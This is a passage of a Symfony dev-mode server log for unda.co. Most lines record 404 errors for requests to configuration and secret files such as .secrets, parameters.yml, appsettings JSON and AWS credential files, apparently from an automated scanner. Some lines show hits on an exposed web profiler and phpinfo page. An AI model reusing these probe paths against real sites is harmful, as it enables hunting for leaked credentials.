  7957. [2025-12-20 19:59:22] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://auth.unda.co/_profiler/phpinfo","method":"GET"} []
  7958. [2025-12-20 19:59:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /admin/config_pro.toml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /admin/config_pro.toml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7959. [2025-12-20 20:01:23] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /ansible/aws/inventory/ec2.ini"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /ansible/aws/inventory/ec2.ini\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7960. [2025-12-20 20:01:37] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/aws/s3.ts"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/aws/s3.ts\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7961. [2025-12-20 20:01:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/config.ino"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/config.ino\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7962. [2025-12-20 20:01:46] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a26a5e","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a26a5e?panel=request","method":"GET"} []
  7963. [2025-12-20 20:01:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  7964. [2025-12-20 20:03:16] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/model/config.ts"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/model/config.ts\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7965. [2025-12-20 20:04:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/settings.py"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/settings.py\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7966. [2025-12-20 20:04:08] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api_gateway/conf/pay.toml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api_gateway/conf/pay.toml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7967. [2025-12-20 20:04:28] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app-config.local.properties"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app-config.local.properties\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7968. [2025-12-20 20:04:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app.py"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app.py\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7969. [2025-12-20 20:04:40] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app.toml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app.toml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7970. [2025-12-20 20:04:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app.yaml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app.yaml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7971. [2025-12-20 20:04:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app/.secrets"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app/.secrets\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7972. [2025-12-20 20:05:06] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app/config/development.ini"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app/config/development.ini\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7973. [2025-12-20 20:05:08] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app/config/parameters.yml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app/config/parameters.yml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7974. [2025-12-20 20:05:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app/config/parameters.yml.dist"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app/config/parameters.yml.dist\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7975. [2025-12-20 20:05:16] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app/models/post.rb"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app/models/post.rb\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7976. [2025-12-20 20:05:20] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app/sign.go"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app/sign.go\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7977. [2025-12-20 20:05:26] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://auth.unda.co/app_dev.php/_profiler/phpinfo","method":"GET"} []
  7978. [2025-12-20 20:05:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /application.ini"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /application.ini\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7979. [2025-12-20 20:07:01] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  7980. [2025-12-20 20:07:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /application/configs/application.ini"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /application/configs/application.ini\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7981. [2025-12-20 20:07:14] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /application/libraries/aws-config.ini"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /application/libraries/aws-config.ini\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7982. [2025-12-20 20:07:18] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /application/libraries/aws/access.ini"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /application/libraries/aws/access.ini\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7983. [2025-12-20 20:07:23] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /appsettings.Development.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /appsettings.Development.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7984. [2025-12-20 20:07:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /appsettings.Production.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /appsettings.Production.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7985. [2025-12-20 20:07:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /appsettings.QA.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /appsettings.QA.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7986. [2025-12-20 20:07:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /appsettings.Staging.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /appsettings.Staging.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7987. [2025-12-20 20:08:01] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /appsettings.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /appsettings.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7988. [2025-12-20 20:08:05] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /appveyor.yml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /appveyor.yml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7989. [2025-12-20 20:08:15] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /aws-example.toml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /aws-example.toml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7990. [2025-12-20 20:08:20] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /aws-lambda.properties"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /aws-lambda.properties\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7991. [2025-12-20 20:08:27] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /aws-notifications.ts"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /aws-notifications.ts\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7992. [2025-12-20 20:08:30] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /aws-nuke.yaml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /aws-nuke.yaml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7993. [2025-12-20 20:08:34] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"12ae6e","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/12ae6e","method":"GET"} []
  7994. [2025-12-20 20:08:34] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  7995. [2025-12-20 20:08:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /aws-s3.service.ts"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /aws-s3.service.ts\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7996. [2025-12-20 20:08:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /aws-s3.ts"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /aws-s3.ts\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7997. [2025-12-20 20:08:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /aws-wrapper.ts"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /aws-wrapper.ts\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7998. [2025-12-20 20:09:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /aws.config.ts"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /aws.config.ts\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7999. [2025-12-20 20:09:11] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /aws.ino"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /aws.ino\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8000. [2025-12-20 20:09:15] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /aws.md"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /aws.md\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8001. [2025-12-20 20:09:22] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /aws.properties"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /aws.properties\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8002. [2025-12-20 20:09:28] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /aws.service.ts"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /aws.service.ts\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8003. [2025-12-20 20:09:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /aws.show.yaml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /aws.show.yaml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
